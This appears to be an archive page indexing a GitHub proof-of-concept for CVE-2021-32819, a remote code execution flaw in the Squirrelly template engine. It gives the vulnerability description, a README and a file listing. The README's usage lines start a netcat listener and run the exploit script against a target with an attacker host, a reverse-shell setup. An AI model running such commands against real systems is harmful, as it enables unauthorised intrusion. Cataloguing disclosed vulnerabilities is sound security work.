CVE-2021-32819 PoC — Squirrelly 信息泄露漏洞

Source

https://github.com/Abady0x1/CVE-2021-32819

Associated Vulnerability

Title:Squirrelly 信息泄露漏洞 (CVE-2021-32819)
Description:npm Npm squirrelly是美国npm公司的一个应用软件。提供一个使用JavaScript实现的现代，可配置且功能强大的快速模板引擎。 Squirrelly 存在信息泄露漏洞，该漏洞源于通过Express渲染API将纯模板数据与引擎配置选项混合。通过覆盖内部配置选项，可以在下游应用程序中触发远程代码执行。

Description

SquirrellyJS mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options, remote code execution may be triggered in downstream applications.

Readme

# CVE-2021-32819
CVE-2021-32819 : SquirrellyJS mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options, remote code execution may be triggered in downstream applications.

### Source
https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
### Analysis
https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
### squirrelly
v8.0.0 >= v8.0.8 Remote Code Execution
### Environment
Ubuntu 20.04.1

### Example
```
nc -lvp 443

python3 exploit.py http://example.com/  ATTACKER_HOST 443
```

![Proof of concept](https://raw.githubusercontent.com/Abady0x/CVE-2021-32819/main/img/POC.png)

File Snapshot


 [4.0K]  /data/pocs/c59b8ca8881bae6749d4969678ca2dde870c76ef
├── [ 809]  exploit.py
├── [4.0K]  img
│   └── [ 58K]  POC.png
└── [ 676]  README.md

1 directory, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!